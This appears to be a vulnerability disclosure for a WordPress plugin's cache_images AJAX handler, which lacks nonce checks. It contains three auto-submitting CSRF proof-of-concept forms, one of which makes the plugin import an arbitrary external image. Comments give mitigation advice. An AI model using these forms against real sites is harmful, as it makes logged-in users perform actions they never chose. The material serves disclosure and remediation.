The plugin does not implement nonce checks, which could allow attackers to make any logged-in user upload images via a CSRF attack.
This allows the import of any image by a user of any user level.
<!--
  Proof of concept for the missing nonce check: a form that POSTs
  action=cache_images, do=getlist and domain=example.com to the site's
  admin-ajax.php endpoint. The form carries no nonce field, so a handler that
  skips nonce verification cannot tell this request from one the user made on
  purpose. What do=getlist returns is not shown on this page; presumably it
  lists images for the given domain (confirm against the plugin source).

  Mitigation on the plugin side: the cache_images AJAX handler should verify a
  nonce (e.g. check_ajax_referer()) and the caller's capability
  (current_user_can()) before acting on the "do" parameter.
-->
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="cache_images">
<input type="text" name="do" value="getlist">
<input type="text" name="domain" value="example.com">
</form>
<script>
// Submits the form as soon as the script runs; no click by the user is needed.
document.getElementById("test").submit();
</script>
<!--
  Proof of concept for the missing nonce check on the do=getdomains operation:
  the form POSTs action=cache_images and do=getdomains to admin-ajax.php and
  contains no nonce field. What getdomains returns is not shown on this page;
  presumably a list of image source domains (confirm against the plugin source).

  A handler that verifies a nonce (e.g. check_ajax_referer()) and the caller's
  capability (current_user_can()) would reject this request.
-->
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="cache_images">
<input type="text" name="do" value="getdomains">
</form>
<script>
// Submits the form as soon as the script runs; no click by the user is needed.
document.getElementById("test").submit();
</script>
<!--
  Proof of concept for the missing nonce check on the do=regen operation: the
  form POSTs action=cache_images, do=regen, an external image URL in "url" and
  postid=2 to admin-ajax.php, again without any nonce field. Presumably regen
  makes the plugin import the image at "url" for the post given by "postid";
  this matches the advisory's "upload images" impact but should be confirmed
  against the plugin source.

  Both "url" and "postid" are chosen by whoever built the form, so the handler
  should verify a nonce (e.g. check_ajax_referer()) and check that the current
  user may edit that post (current_user_can()) before importing anything.
-->
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="cache_images">
<input type="text" name="do" value="regen">
<input type="text" name="url" value="https://heise.cloudimg.io/v7/_www-heise-de_/imgs/18/3/4/8/4/2/6/8/shutterstock_1124819546_jpg.jpg-d3889c815ce30778.jpeg?org_if_sml=1&q=30&width=1032">
<input type="text" name="postid" value="2">
</form>
<script>
// Submits the form as soon as the script runs; no click by the user is needed.
document.getElementById("test").submit();
</script>